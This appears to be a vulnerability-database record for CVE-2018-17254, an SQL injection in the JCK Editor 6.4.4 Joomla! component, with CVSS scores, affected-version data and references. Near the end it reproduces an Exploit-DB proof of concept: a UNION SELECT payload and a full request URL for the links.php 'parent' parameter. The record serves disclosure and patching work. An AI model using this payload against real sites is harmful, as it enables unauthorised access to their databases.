ID CVE-2018-17254
Type cve
Reporter cve@mitre.org
Modified 2018-11-06T18:53:00
Description
The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
{"id": "CVE-2018-17254", "bulletinFamily": "NVD", "title": "CVE-2018-17254", "description": "The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.", "published": "2018-09-20T14:29:00", "modified": "2018-11-06T18:53:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17254", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/45423/"], "cvelist": ["CVE-2018-17254"], "type": "cve", "lastseen": "2020-10-03T13:20:16", "edition": 3, "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "dsquare", "idList": ["E-661"]}, {"type": "exploitdb", "idList": ["EDB-ID:45423"]}], "modified": "2020-10-03T13:20:16", "rev": 2}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-10-03T13:20:16", "rev": 2}, "vulnersScore": 5.1}, "cpe": ["cpe:/a:arkextensions:jck_editor:6.4.4"], "affectedSoftware": [{"cpeName": "arkextensions:jck_editor", "name": "arkextensions jck editor", "operator": "eq", "version": "6.4.4"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\\!:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\\!:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17254"], "description": "SQL Injection vulnerability in Joomla Component JCK Editor links.php parent parameter\n\nVulnerability Type: SQL Injection", "modified": "2018-10-03T00:00:00", "published": "2018-10-03T00:00:00", "id": "E-661", "href": "", "type": "dsquare", "title": "Joomla Component JCK Editor 6.4.4 SQL Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-10-07T14:33:50", "description": "Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection. CVE-2018-17254. Webapps exploit for PHP platform. Tags: SQL Injection (SQLi)", "published": "2018-09-17T00:00:00", "type": "exploitdb", "title": "Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17254"], "modified": "2018-09-17T00:00:00", "id": "EDB-ID:45423", "href": "https://www.exploit-db.com/exploits/45423/", "sourceData": "# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection\r\n# Date: 2018-09-14\r\n# Exploit Author: Hamza Megahed\r\n# Vendor Homepage:https://www.joomla.org/\r\n# Download: https://arkextensions.com/products/jck-editor\r\n# Version: 6.4.4\r\n# Tested on: Ubuntu, FireFox,\r\n# CVE: N/A\r\n\r\n# Parameter = parent\r\n# Payload = \" UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa\r\n# Poc:\r\n\r\nTest = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45423/"}]}